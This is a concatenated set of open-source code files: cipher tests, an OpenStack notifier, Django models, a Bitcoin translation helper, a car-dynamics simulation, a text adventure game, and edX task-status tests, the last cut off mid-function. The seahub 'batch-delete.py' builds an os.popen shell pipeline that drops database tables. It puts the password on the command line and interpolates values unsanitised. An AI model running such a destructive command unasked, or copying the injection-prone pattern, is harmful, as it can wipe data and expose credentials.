14, 134, 161, 238, 30, 241, 37, 224, 166, 45, 119, 109, 202, 196, 93,
190, 220, 69, 49, 21, 228, 209, 60, 73, 99, 65, 102, 7, 229, 200, 19,
82, 240, 71, 105, 169, 214, 194, 64, 142, 12, 233, 88, 201, 11, 72,
92, 221, 27, 32, 176, 124, 205, 189, 177, 246, 35, 112, 219, 61, 129,
170, 173, 100, 84, 242, 157, 26, 218, 20, 33, 191, 155, 232, 87, 86,
153, 114, 97, 130, 29, 192, 164, 239, 90, 43, 236, 208, 212, 185, 75,
210, 0, 81, 227, 5, 116, 243, 34, 18, 182, 70, 181, 197, 217, 95, 183,
101, 252, 248, 107, 89, 136, 216, 203, 68, 91, 223, 96, 141, 150, 131,
13, 152, 198, 111, 44, 222, 125, 244, 76, 251, 158, 106, 24, 42, 38,
77, 2, 213, 207, 249, 147, 113, 135, 245, 118, 193, 47, 98, 145, 66,
160, 123, 211, 165, 78, 204, 80, 250, 110, 162, 48, 58, 10, 180, 55,
231, 79, 149, 74, 62, 50, 148, 143, 206, 28, 15, 57, 159, 139, 225,
122, 237, 138, 171, 36, 56, 115, 63, 144, 154, 6, 230, 133, 215, 41,
184, 22, 104, 254, 234, 253, 187, 226, 247, 188, 156, 151, 40, 108,
51, 83, 178, 52, 3, 31, 255, 195, 53, 235, 126, 167, 120]]
encrypt_table = b''.join(get_table(b'foobar!'))
decrypt_table = maketrans(encrypt_table, maketrans(b'', b''))
for i in range(0, 256):
assert (target1[0][i] == ord(encrypt_table[i]))
assert (target1[1][i] == ord(decrypt_table[i]))
encrypt_table = b''.join(get_table(b'barfoo!'))
decrypt_table = maketrans(encrypt_table, maketrans(b'', b''))
for i in range(0, 256):
assert (target2[0][i] == ord(encrypt_table[i]))
assert (target2[1][i] == ord(decrypt_table[i]))
def test_encryption():
from shadowsocks.crypto import util
cipher = TableCipher('table', b'test', b'', 1)
decipher = TableCipher('table', b'test', b'', 0)
util.run_cipher(cipher, decipher)
if __name__ == '__main__':
test_table_result()
test_encryption()
|
apache-2.0
|
oeeagle/quantum
|
neutron/openstack/common/notifier/api.py
|
22
|
5734
|
# Copyright 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from oslo.config import cfg
from neutron.openstack.common import context
from neutron.openstack.common.gettextutils import _
from neutron.openstack.common import importutils
from neutron.openstack.common import jsonutils
from neutron.openstack.common import log as logging
from neutron.openstack.common import timeutils
LOG = logging.getLogger(__name__)
notifier_opts = [
cfg.MultiStrOpt('notification_driver',
default=[],
help='Driver or drivers to handle sending notifications'),
cfg.StrOpt('default_notification_level',
default='INFO',
help='Default notification level for outgoing notifications'),
cfg.StrOpt('default_publisher_id',
default='$host',
help='Default publisher_id for outgoing notifications'),
]
CONF = cfg.CONF
CONF.register_opts(notifier_opts)
WARN = 'WARN'
INFO = 'INFO'
ERROR = 'ERROR'
CRITICAL = 'CRITICAL'
DEBUG = 'DEBUG'
log_levels = (DEBUG, WARN, INFO, ERROR, CRITICAL)
class BadPriorityException(Exception):
pass
def notify_decorator(name, fn):
"""Decorator for notify which is used from utils.monkey_patch().
:param name: name of the function
:param function: - object of the function
:returns: function -- decorated function
"""
def wrapped_func(*args, **kwarg):
body = {}
body['args'] = []
body['kwarg'] = {}
for arg in args:
body['args'].append(arg)
for key in kwarg:
body['kwarg'][key] = kwarg[key]
ctxt = context.get_context_from_function_and_args(fn, args, kwarg)
notify(ctxt,
CONF.default_publisher_id,
name,
CONF.default_notification_level,
body)
return fn(*args, **kwarg)
return wrapped_func
def publisher_id(service, host=None):
if not host:
host = CONF.host
return "%s.%s" % (service, host)
def notify(context, publisher_id, event_type, priority, payload):
"""Sends a notification using the specified driver
:param publisher_id: the source worker_type.host of the message
:param event_type: the literal type of event (ex. Instance Creation)
:param priority: patterned after the enumeration of Python logging
levels in the set (DEBUG, WARN, INFO, ERROR, CRITICAL)
:param payload: A python dictionary of attributes
Outgoing message format includes the above parameters, and appends the
following:
message_id
a UUID representing the id for this notification
timestamp
the GMT timestamp the notification was sent at
The composite message will be constructed as a dictionary of the above
attributes, which will then be sent via the transport mechanism defined
by the driver.
Message example::
{'message_id': str(uuid.uuid4()),
'publisher_id': 'compute.host1',
'timestamp': timeutils.utcnow(),
'priority': 'WARN',
'event_type': 'compute.create_instance',
'payload': {'instance_id': 12, ... }}
"""
if priority not in log_levels:
raise BadPriorityException(
_('%s not in valid priorities') % priority)
# Ensure everything is JSON serializable.
payload = jsonutils.to_primitive(payload, convert_instances=True)
msg = dict(message_id=str(uuid.uuid4()),
publisher_id=publisher_id,
event_type=event_type,
priority=priority,
payload=payload,
timestamp=str(timeutils.utcnow()))
for driver in _get_drivers():
try:
driver.notify(context, msg)
except Exception as e:
LOG.exception(_("Problem '%(e)s' attempting to "
"send to notification system. "
"Payload=%(payload)s")
% dict(e=e, payload=payload))
_drivers = None
def _get_drivers():
"""Instantiate, cache, and return drivers based on the CONF."""
global _drivers
if _drivers is None:
_drivers = {}
for notification_driver in CONF.notification_driver:
add_driver(notification_driver)
return _drivers.values()
def add_driver(notification_driver):
"""Add a notification driver at runtime."""
# Make sure the driver list is initialized.
_get_drivers()
if isinstance(notification_driver, basestring):
# Load and add
try:
driver = importutils.import_module(notification_driver)
_drivers[notification_driver] = driver
except ImportError:
LOG.exception(_("Failed to load notifier %s. "
"These notifications will not be sent.") %
notification_driver)
else:
# Driver is already loaded; just add the object.
_drivers[notification_driver] = notification_driver
def _reset_drivers():
"""Used by unit tests to reset the drivers."""
global _drivers
_drivers = None
|
apache-2.0
|
cobalys/django
|
tests/modeltests/files/models.py
|
141
|
1038
|
"""
42. Storing files according to a custom storage system
``FileField`` and its variations can take a ``storage`` argument to specify how
and where files should be stored.
"""
import random
import tempfile
from django.db import models
from django.core.files.storage import FileSystemStorage
temp_storage_location = tempfile.mkdtemp()
temp_storage = FileSystemStorage(location=temp_storage_location)
class Storage(models.Model):
def custom_upload_to(self, filename):
return 'foo'
def random_upload_to(self, filename):
# This returns a different result each time,
# to make sure it only gets called once.
return '%s/%s' % (random.randint(100, 999), filename)
normal = models.FileField(storage=temp_storage, upload_to='tests')
custom = models.FileField(storage=temp_storage, upload_to=custom_upload_to)
random = models.FileField(storage=temp_storage, upload_to=random_upload_to)
default = models.FileField(storage=temp_storage, upload_to='tests', default='tests/default.txt')
|
bsd-3-clause
|
cloudcopy/seahub
|
tools/batch-delete.py
|
6
|
1819
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys
import MySQLdb
import settings
try:
dbname = os.environ['DBNAME']
dbuser = os.environ['DBUSER']
dbpasswd = os.environ['DBPASSWD']
except:
sys.stderr.write('Environment not set! Exit\n')
sys.exit(1)
def check_settings():
if settings.DATABASE_ENGINE == 'mysql':
sys.stderr.write('[ERROR] Current settings is mysql, need sqlite settings\n')
sys.exit(1)
def do_create():
root_passwd = raw_input("Please enter root password to create database %s: " % dbname)
conn = MySQLdb.Connect(host='localhost', user='root', passwd=root_passwd)
cursor = conn.cursor()
create_cmd = ( "CREATE DATABASE IF NOT EXISTS `%s` default charset utf8 COLLATE utf8_general_ci;") % (dbname)
grant_cmd = ("grant all privileges on %s.* to '%s'@localhost identified by '%s';") % (dbname, dbuser, dbpasswd)
try:
cursor.execute(create_cmd)
cursor.execute(grant_cmd)
except:
pass
cursor.close()
conn.close()
def do_delete(prefix):
cmd = ('echo "select concat(\'drop table \', table_name ,\';\') from TABLES where TABLE_SCHEMA =\'%s\' and table_name like \'%s_%%\' ;" | mysql -u %s -p%s information_schema | sed -n \'2,$p\' | mysql -u %s -p%s %s') % (dbname, prefix, dbuser, dbpasswd, dbuser, dbpasswd, dbname)
try:
output = os.popen(cmd).read()
except:
pass
if __name__=="__main__":
# check current settings.py
check_settings()
# create database if not exists
do_create()
# detele all seahub tables
for app in settings.INSTALLED_APPS:
app_name = app.split('.')[-1]
do_delete(app_name)
do_delete('django')
print '[Delete seahub tables...Done]'
|
apache-2.0
|
Bushstar/UFO-Project
|
share/qt/extract_strings_qt.py
|
24
|
2667
|
#!/usr/bin/env python3
# Copyright (c) 2012-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Extract _("...") strings for translation and convert to Qt stringdefs so that
they can be picked up by Qt linguist.
'''
from subprocess import Popen, PIPE
import operator
import os
import sys
OUT_CPP="qt/bitcoinstrings.cpp"
EMPTY=['""']
def parse_po(text):
"""
Parse 'po' format produced by xgettext.
Return a list of (msgid,msgstr) tuples.
"""
messages = []
msgid = []
msgstr = []
in_msgid = False
in_msgstr = False
for line in text.split('\n'):
line = line.rstrip('\r')
if line.startswith('msgid '):
if in_msgstr:
messages.append((msgid, msgstr))
in_msgstr = False
# message start
in_msgid = True
msgid = [line[6:]]
elif line.startswith('msgstr '):
in_msgid = False
in_msgstr = True
msgstr = [line[7:]]
elif line.startswith('"'):
if in_msgid:
msgid.append(line)
if in_msgstr:
msgstr.append(line)
if in_msgstr:
messages.append((msgid, msgstr))
return messages
files = sys.argv[1:]
# xgettext -n --keyword=_ $FILES
XGETTEXT=os.getenv('XGETTEXT', 'xgettext')
if not XGETTEXT:
print('Cannot extract strings: xgettext utility is not installed or not configured.',file=sys.stderr)
print('Please install package "gettext" and re-run \'./configure\'.',file=sys.stderr)
sys.exit(1)
child = Popen([XGETTEXT,'--output=-','-n','--keyword=_'] + files, stdout=PIPE)
(out, err) = child.communicate()
messages = parse_po(out.decode('utf-8'))
f = open(OUT_CPP, 'w', encoding="utf8")
f.write("""
#include <QtGlobal>
// Automatically generated by extract_strings_qt.py
#ifdef __GNUC__
#define UNUSED __attribute__((unused))
#else
#define UNUSED
#endif
""")
f.write('static const char UNUSED *bitcoin_strings[] = {\n')
f.write('QT_TRANSLATE_NOOP("bitcoin-core", "%s"),\n' % (os.getenv('PACKAGE_NAME'),))
f.write('QT_TRANSLATE_NOOP("bitcoin-core", "%s"),\n' % (os.getenv('COPYRIGHT_HOLDERS'),))
if os.getenv('COPYRIGHT_HOLDERS_SUBSTITUTION') != os.getenv('PACKAGE_NAME'):
f.write('QT_TRANSLATE_NOOP("bitcoin-core", "%s"),\n' % (os.getenv('COPYRIGHT_HOLDERS_SUBSTITUTION'),))
messages.sort(key=operator.itemgetter(0))
for (msgid, msgstr) in messages:
if msgid != EMPTY:
f.write('QT_TRANSLATE_NOOP("bitcoin-core", %s),\n' % ('\n'.join(msgid)))
f.write('};\n')
f.close()
|
mit
|
Shekharrajak/mubosym
|
exa_8_simple_car_sequencer.py
|
2
|
6197
|
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 14 20:41:09 2015
@author: oliver
"""
import numpy as np
from sympy import symbols, sin
import mubosym as mbs
from interp1d_interface import interp
###############################################################
# general system setup example
myMBS = mbs.MBSworld('simple_car_sequ', connect=True, force_db_setup=False)
axes_rear_marker = ['body_car_rr', 'body_car_rl' ]
axes_front_marker = ['body_car_fr', 'body_car_fl' ]
I_car = [500.,3000.,1500.]
I_0 = [0.,0.,0.]
I_tire = [1.,1.,1.]
k = interp(filename = mbs.DATA_PATH+"/vel_01.dat")
#high end definition of static variables...
@mbs.static_vars(t_p=0, diff_p=0)
def lateral_inp(t):
#return -20.
velocity = myMBS.get_control_signal(0)
v_soll = k.f_interp(t)
diff = (v_soll-velocity)/10.0
delt = (t-lateral_inp.t_p)
diff = (lateral_inp.diff_p *0.5 + diff* delt) / (delt + 0.5)
lateral_inp.diff_p = diff
lateral_inp.t_p = t
return -2000*diff
def zero(t):
return 0.
myMBS.add_parameter('theta_lateral', lateral_inp, zero, zero)
def axes_front(axes_marker, n):
myMBS.add_body_3d('carrier_f'+str(n), axes_marker, 60.0, I_0, 'y-axes', parameters = [])
myMBS.add_force_special('carrier_f'+str(n), 'spring-damper-axes', parameters = [20000., -1.0, 800.])
myMBS.add_force_special('carrier_f'+str(n), 'grav')
myMBS.add_rotating_marker_para('carrier_M_f'+str(n), 'carrier_f'+str(n), 'phi', 0.,-0.20,0.0, 'Y')
myMBS.add_body_3d('tire_f'+str(n), 'carrier_M_f'+str(n), 1.0, I_tire , 'revolute-Z', parameters = [])
myMBS.add_one_body_force_model('tiremodel_'+str(n), 'tire_f'+str(n),'carrier_M_f'+str(n),'tire')
def axes_rear(axes_marker, n):
myMBS.add_body_3d('carrier_r'+str(n), axes_marker, 60.0, I_0, 'y-axes', parameters = [])
myMBS.add_force_special('carrier_r'+str(n), 'spring-damper-axes', parameters = [20000., -1.0, 800.])
myMBS.add_force_special('carrier_r'+str(n), 'grav')
myMBS.add_marker('carrier_M_r'+str(n), 'carrier_r'+str(n) , 0.,-0.20,0.0)
myMBS.add_body_3d('tire_r'+str(n), 'carrier_M_r'+str(n), 1.0, I_tire , 'revolute-Z', parameters = [])
myMBS.add_one_body_force_model('tiremodel_'+str(n), 'tire_r'+str(n),'carrier_M_r'+str(n),'tire')
# a simple car using sequence buildup
myMBS.add_body_3d('body_car', 'world_M0', 2000.0, I_car, 'free-6', parameters = [], graphics = False) #[np.pi/2., 2.0])
myMBS.add_marker('body_car_fr', 'body_car', 1.5,0.,0.7)
myMBS.add_marker('body_car_fl', 'body_car', 1.5,0.,-0.7)
myMBS.add_marker('body_car_rr', 'body_car', -1.5,0.,0.7)
myMBS.add_marker('body_car_rl', 'body_car', -1.5,0.,-0.7)
myMBS.add_force_special('body_car', 'grav')
###############################################
##steering expression:
#def rotation_inp_expr():
# t, A = symbols('t A')
# return A*sin(1.0*t)
#A = symbols('A')
#def rotation_inp_expr():
# t, A = symbols('t A')
# return (A+0.02*t)*sin(1.0*t)
A = -0.02
omega = 0.8
def rotation_inp(t):
if t < 10.:
return 0.
else:
return A*np.sin(omega*(t-10.))
def rotation_inp_diff(t):
if t < 10.:
return 0.
else:
return A*omega*np.cos(omega*(t-10.))
def rotation_inp_diff_2(t):
if t < 10.:
return 0.
else:
return -A*omega*omega*np.sin(omega*(t-10.))
#myMBS.add_parameter_expr('phi', rotation_inp_expr(), {A: 0.0})
myMBS.add_parameter('phi', rotation_inp, rotation_inp_diff, rotation_inp_diff_2)
n = 0
for name in axes_rear_marker:
axes_rear(name, n)
n+=1
n = 0
for name in axes_front_marker:
axes_front(name, n)
n+=1
myMBS.add_parameter_torque('tire_r0', 'carrier_M_r0', [0.,0.,1.], 'theta_lateral')
myMBS.add_parameter_torque('tire_r1', 'carrier_M_r1', [0.,0.,1.], 'theta_lateral')
#################################################
# constants
g = symbols('g')
constants = [ g ] # Constant definitions
constants_vals = [9.81] # Numerical value
const_dict = dict(zip(constants, constants_vals))
myMBS.set_const_dict(const_dict)
##################################
# create control signals:
vel_1 = myMBS.get_body('body_car').get_vel_magnitude()
myMBS.add_control_signal(vel_1)
##################################
#to settle car ...
for b in myMBS.bodies.keys():
myMBS.add_damping(b, 10.0)
body = myMBS.get_body('body_car')
body.set_small_angles([body.get_phi(), body.get_psi()])
myMBS.kaneify(simplify=False)
moving_frames_in_graphics = ['tire_f0', 'carrier_M_f0', 'body_car']
fixed_frames_in_graphics = []
forces_in_graphics = ['body_car']
bodies_in_graphics = {'tire_f0': 'tire','tire_f1': 'tire','tire_r0': 'tire','tire_r1': 'tire', 'body_car':'box'}
myMBS.prep_lambdas(moving_frames_in_graphics, fixed_frames_in_graphics, forces_in_graphics, bodies_in_graphics)
############################################################
# now setup all maneuvers
#myMBS.exchange_parameter_expr('phi', rotation_inp_expr(), {A: 0.05})
dt = 0.01 # 10 ms for a nice animation result
t_max = 35.
#first starting conditions ... (thrown on the street)
#x0 = np.hstack(( 0. * np.ones(myMBS.dof), 1. * np.zeros(myMBS.dof)))
x0 = np.array([ -6.98702128e-08, 5.85260703e-06, -3.62073872e-07,
1.12804336e-04, 9.27282033e-01, 9.40668424e-08,
-7.54750554e-01, -3.32459591e-04, -7.54750481e-01,
-3.31175253e-04, -7.54749593e-01, -3.33075785e-04,
-7.54749524e-01, -3.31802373e-04, -2.89428308e-07,
-6.98425700e-08, -2.59191657e-06, 5.04886037e-06,
2.39749721e-07, -2.31595563e-07, -3.82747611e-06,
-5.06125891e-06, -3.57698842e-06, -5.35752999e-06,
3.04894626e-06, -5.07140660e-06, 3.26773587e-06,
-5.36760469e-06])
myMBS.inte_grate_full(x0, t_max, dt, mode = 0, tolerance = 1e+0)
x_final = myMBS.x_t[-1]
################################################
# linear analysis of the last state (returns also the jacobian)
jac = myMBS.calc_lin_analysis_n(len(myMBS.x_t)-1)
inp = raw_input("Weiter zur Animation (return)...")
myMBS.prepare(mbs.DATA_PATH, save=False)
#myMBS.plotting(t_max, dt, plots='tire')
a = myMBS.animate(t_max, dt, scale = 4, time_scale = 1, t_ani = 35., labels = True, center = 0)
|
mit
|
Paul-Haley/LPTHW_python3
|
ex43.py
|
1
|
9174
|
from sys import exit
from random import randint
class Scene(object):
def enter(self):
print("This scene is not yet configured. Subclass it and implement "\
"enter().")
exit(1) # error numbers beyond 0 typically indicate an error
class Engine(object):
def __init__(self, scene_map):
self.scene_map = scene_map
def play(self):
current_scene = self.scene_map.opening_scene()
last_scene = self.scene_map.next_scene('finished')
while current_scene != last_scene:
next_scene_name = current_scene.enter()
current_scene = self.scene_map.next_scene(next_scene_name)
# be sure to print out the last scene
current_scene.enter()
class Death(Scene):
quips = [
"You died. You kinda suck at this.",
"Your mom would be proud...if she were smarter.",
"Such a luser.", # (sic)
"I have a small puppy that's better at this."
]
def enter(self):
print(Death.quips[randint(0, len(self.quips) - 1)])
exit(1)
class CentralCorridor(Scene):
def enter(self):
print("The Gothons of Planet Percal #25 have invaded your ship and destroyed")
print("your entire crew. You are the last surviving member and your last")
print("mission is to get the neutron destruct bomb from the Weapons Armory,")
print("put it on the bridge, and blow the hsip up after getting into an ")
print("escape pod.\n\n") # Little lazy here
print("Your're running down the central corridor to the Weapons Armory when")
print("a Gothon jumps out, red scaly skin, dark grimy teeth, and evil clown costume")
print("flowing around his hate filled body. He's blocking the door to the")
print("Armory and about to pull a weapon to blast you.")
action = input("> ")
if action == "shoot!":
print("Quick on the draw you yank out your blaster and fire it at the Gothon.")
print("His clown costume is flowing and moving around his body, which throws")
print("off your aim. Your laser hits his custume but misses him entirely. This")
print("makes him fly into an insane rage an dblast you repeatedly in the face until you are dead. Then he eats you.")
return 'death'
elif action == "dodge!":
print("Like a world class boxer you dodge, weave, slip and slide right")
print("as the Gothon's blaster cranks a laser past your head.")
print("In the middle of your artful dodge your foot slips and you")
print("bang your head on the metal wall and pass out.")
print("You wake up shortly after only to die as the Githon stomps on")
print("your head and eats you.")
return 'death'
elif action == "tell a joke":
print("Lucky for you they made you learn Gothon insults in the academy.")
print("You tell the one Gothon joke you know:")
print("lbhe zbgure vf fb sng, jura fur fvgf nebhaq gur ubhfr, fur fvgf nebnaq gur ubhfq.")
print("The Gothon stops, tries not to laugh, then busts out laughing and can't move.")
print("While he's laughing you run up and shoot him square in the head")
print("putting him down, you jump through the Weapon Armory door.")
return 'laser_weapon_armory'
else:
print("DOES NOT COMPUTE!")
return 'central_corridor'
class LaserWeaponArmory(Scene):
def enter(self):
print("You do a dive roll into the Weapon Armory, crouch and scan the room")
print("for more Gothons that might be hiding. It's dead quiet, too quiet.")
print("You stand up and run to the far side of the room and find the")
print("neutron bomb in its container. There's a keypad lock on the box")
print("and you need the code to get the bomb out. If you get the code")
print("wrong 10 times then the lock closes forever and you can't")
print("get the bomb. The code is 3 digits.")
# The probability of solving this is low, fixing numbers helps
code = "%d%d%d" % (randint(1,9), randint(1,9), randint(1,9))
guess = input("[keypad]> ")
guesses = 0
while guess != code and guesses < 10:
print("BZZZZEDDD!")
guesses += 1
guess = input("[keypad]> ") # we could have done a prompt variable
if guess == code:
print("The container clicks open and the seal breaks, letting gas out.")
print("You grab the neutron bomb and run as fast as you can to the")
print("bridge where you must place it in the right spot.")
return 'the_bridge'
else:
print("The lock buzzes one last time and then you hear a sickening")
print("melting sound as the mechanism is fused together.")
print("You decide to sit there, and finally the Gothons blow up the")
print("ship from their ship and you die.")
return 'death'
class TheBridge(Scene):
def enter(self):
print("You burst onto the Bridge with the netron destruct bomb")
print("under your arm and the surprise 5 Gothons who are trying to")
print("take control of the ship. Each of them has an even uglier")
print("clown custume than the last. They haven't pulled their")
print("weapons out yet, as they see the active bomb under your")
print("arm and don't want to set it off.")
action = input("> ") # could have used a global prompt variable
if action == "throw the bomb":
print("In a panic you throw the bomb at the group of Gothons")
print("and make a leap for the door. Right as you drop it a")
print("Gothon shoots you right in the back killing you.")
print("As you die you see another Gothon frantically try to disarm")
print("the bomb. You die knowing they will probably blow up when")
print("it goes off.")
return 'death'
elif action == "slowly place the bomb":
print("You point your blaster at the bomb under your arm")
print("and the Gothons put their hand up and start to sweat.")
print("You inch backward to the door, open it, and then carefully")
print("place the bomb on the floor, pointing your blaster at it.")
print("You then jump back through the door, punch the close button")
print("and blast the lock so the Gothons can't get out.")
print("Now that the bomb is placed you run to the escape pod to")
print("get off this tin can.")
return 'escape_pod'
else:
print("DOES NOT COMPUTE!") # Could be a variable or function
return "the_bridge"
class EscapePod(Scene):
def enter(self):
print("You rush through the ship desperately trying to make it to")
print("the escape pod before the whole ship explodes. It seems like")
print("hardly any Gothons are on the ship, so your run is clear of")
print("interference. You get to the chamber with the escape pods, and")
print("now need to pick one to take. Some of them could be damaged")
print("but you don't have time to look. There's 5 pods, which one")
print("do you take?")
good_pod = randint(1, 5)
guess = input("[pod #]> ")
if int(guess) != good_pod:
print("You jump into pod %s and hit the eject button." % guess)
print("The pod escapes out into th evoid of space, then")
print("implodes as the hull ruptures, crushing your body")
print("into jam jelly.")
return 'death'
else: # Note this first line is common and could be before the if
print("You jump into pod %s and hit the ejct button." % guess)
print("The pod easily slides out into space heading to")
print("the planet below. As it flies to the planet, you look")
print("back and see your ship implode then explode like a")
print("bright star, taking out the Gothon ship at the same")
print("time. You won!")
return 'finished'
class Finished(Scene):
def enter(self):
print("You won! Good job.")
return 'finished'
class Map(object):
scenes = {
'central_corridor': CentralCorridor(),
'laser_weapon_armory': LaserWeaponArmory(),
'the_bridge': TheBridge(),
'escape_pod': EscapePod(),
'death': Death(),
'finished': Finished()
}
def __init__(self, start_scene):
self.start_scene = start_scene
def next_scene(self, scene_name):
val = Map.scenes.get(scene_name)
return val #This could be combined in one line
def opening_scene(self):
return self.next_scene(self.start_scene)
a_map = Map('central_corridor')
a_game = Engine(a_map)
a_game.play()
|
mit
|
nicky-ji/edx-nicky
|
lms/djangoapps/instructor_task/tests/test_views.py
|
204
|
17817
|
"""
Test for LMS instructor background task views.
"""
import json
from celery.states import SUCCESS, FAILURE, REVOKED, PENDING
from mock import Mock, patch
from django.utils.datastructures import MultiValueDict
from instructor_task.models import PROGRESS
from instructor_task.tests.test_base import (InstructorTaskTestCase,
TEST_FAILURE_MESSAGE,
TEST_FAILURE_EXCEPTION)
from instructor_task.views import instructor_task_status, get_task_completion_info
class InstructorTaskReportTest(InstructorTaskTestCase):
"""
Tests view methods that involve the reporting of status for background tasks.
"""
def _get_instructor_task_status(self, task_id):
"""Returns status corresponding to task_id via api method."""
request = Mock()
request.REQUEST = {'task_id': task_id}
return instructor_task_status(request)
def test_instructor_task_status(self):
instructor_task = self._create_failure_entry()
task_id = instructor_task.task_id
request = Mock()
request.REQUEST = {'task_id': task_id}
response = instructor_task_status(request)
output = json.loads(response.content)
self.assertEquals(output['task_id'], task_id)
def test_missing_instructor_task_status(self):
task_id = "missing_id"
request = Mock()
request.REQUEST = {'task_id': task_id}
response = instructor_task_status(request)
output = json.loads(response.content)
self.assertEquals(output, {})
def test_instructor_task_status_list(self):
# Fetch status for existing tasks by arg list, as if called from ajax.
# Note that ajax does something funny with the marshalling of
# list data, so the key value has "[]" appended to it.
task_ids = [(self._create_failure_entry()).task_id for _ in range(1, 5)]
request = Mock()
request.REQUEST = MultiValueDict({'task_ids[]': task_ids})
response = instructor_task_status(request)
output = json.loads(response.content)
self.assertEquals(len(output), len(task_ids))
for task_id in task_ids:
self.assertEquals(output[task_id]['task_id'], task_id)
def test_get_status_from_failure(self):
# get status for a task that has already failed
instructor_task = self._create_failure_entry()
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], TEST_FAILURE_MESSAGE)
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], FAILURE)
self.assertFalse(output['in_progress'])
expected_progress = {
'exception': TEST_FAILURE_EXCEPTION,
'message': TEST_FAILURE_MESSAGE,
}
self.assertEquals(output['task_progress'], expected_progress)
def test_get_status_from_success(self):
# get status for a task that has already succeeded
instructor_task = self._create_success_entry()
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], "Problem rescored for 2 of 3 students (out of 5)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], SUCCESS)
self.assertFalse(output['in_progress'])
expected_progress = {
'attempted': 3,
'succeeded': 2,
'total': 5,
'action_name': 'rescored',
}
self.assertEquals(output['task_progress'], expected_progress)
def test_get_status_from_legacy_success(self):
# get status for a task that had already succeeded, back at a time
# when 'updated' was used instead of the preferred 'succeeded'.
legacy_progress = {
'attempted': 3,
'updated': 2,
'total': 5,
'action_name': 'rescored',
}
instructor_task = self._create_entry(task_state=SUCCESS, task_output=legacy_progress)
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], "Problem rescored for 2 of 3 students (out of 5)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], SUCCESS)
self.assertFalse(output['in_progress'])
self.assertEquals(output['task_progress'], legacy_progress)
def _create_email_subtask_entry(self, total=5, attempted=3, succeeded=2, skipped=0, task_state=PROGRESS):
"""Create an InstructorTask with subtask defined and email argument."""
progress = {'attempted': attempted,
'succeeded': succeeded,
'skipped': skipped,
'total': total,
'action_name': 'emailed',
}
instructor_task = self._create_entry(task_state=task_state, task_output=progress)
instructor_task.subtasks = {}
instructor_task.task_input = json.dumps({'email_id': 134})
instructor_task.save()
return instructor_task
def test_get_status_from_subtasks(self):
# get status for a task that is in progress, with updates
# from subtasks.
instructor_task = self._create_email_subtask_entry(skipped=1)
task_id = instructor_task.task_id
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['message'], "Progress: emailed 2 of 3 so far (skipping 1) (out of 5)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_id'], task_id)
self.assertEquals(output['task_state'], PROGRESS)
self.assertTrue(output['in_progress'])
expected_progress = {
'attempted': 3,
'succeeded': 2,
'skipped': 1,
'total': 5,
'action_name': 'emailed',
}
self.assertEquals(output['task_progress'], expected_progress)
def _test_get_status_from_result(self, task_id, mock_result=None):
"""
Provides mock result to caller of instructor_task_status, and returns resulting output.
"""
with patch('celery.result.AsyncResult.__new__') as mock_result_ctor:
mock_result_ctor.return_value = mock_result
response = self._get_instructor_task_status(task_id)
output = json.loads(response.content)
self.assertEquals(output['task_id'], task_id)
return output
def test_get_status_to_pending(self):
# get status for a task that hasn't begun to run yet
instructor_task = self._create_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = PENDING
output = self._test_get_status_from_result(task_id, mock_result)
for key in ['message', 'succeeded', 'task_progress']:
self.assertTrue(key not in output)
self.assertEquals(output['task_state'], 'PENDING')
self.assertTrue(output['in_progress'])
def test_update_progress_to_progress(self):
# view task entry for task in progress
instructor_task = self._create_progress_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = PROGRESS
mock_result.result = {
'attempted': 5,
'succeeded': 4,
'total': 10,
'action_name': 'rescored',
}
output = self._test_get_status_from_result(task_id, mock_result)
self.assertEquals(output['message'], "Progress: rescored 4 of 5 so far (out of 10)")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], PROGRESS)
self.assertTrue(output['in_progress'])
self.assertEquals(output['task_progress'], mock_result.result)
def test_update_progress_to_failure(self):
# view task entry for task in progress that later fails
instructor_task = self._create_progress_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = FAILURE
mock_result.result = NotImplementedError("This task later failed.")
mock_result.traceback = "random traceback"
output = self._test_get_status_from_result(task_id, mock_result)
self.assertEquals(output['message'], "This task later failed.")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], FAILURE)
self.assertFalse(output['in_progress'])
expected_progress = {
'exception': 'NotImplementedError',
'message': "This task later failed.",
'traceback': "random traceback",
}
self.assertEquals(output['task_progress'], expected_progress)
def test_update_progress_to_revoked(self):
# view task entry for task in progress that later fails
instructor_task = self._create_progress_entry()
task_id = instructor_task.task_id
mock_result = Mock()
mock_result.task_id = task_id
mock_result.state = REVOKED
output = self._test_get_status_from_result(task_id, mock_result)
self.assertEquals(output['message'], "Task revoked before running")
self.assertEquals(output['succeeded'], False)
self.assertEquals(output['task_state'], REVOKED)
self.assertFalse(output['in_progress'])
expected_progress = {'message': "Task revoked before running"}
self.assertEquals(output['task_progress'], expected_progress)
def _get_output_for_task_success(self, attempted, succeeded, total, student=None):
"""returns the task_id and the result returned by instructor_task_status()."""
# view task entry for task in progress
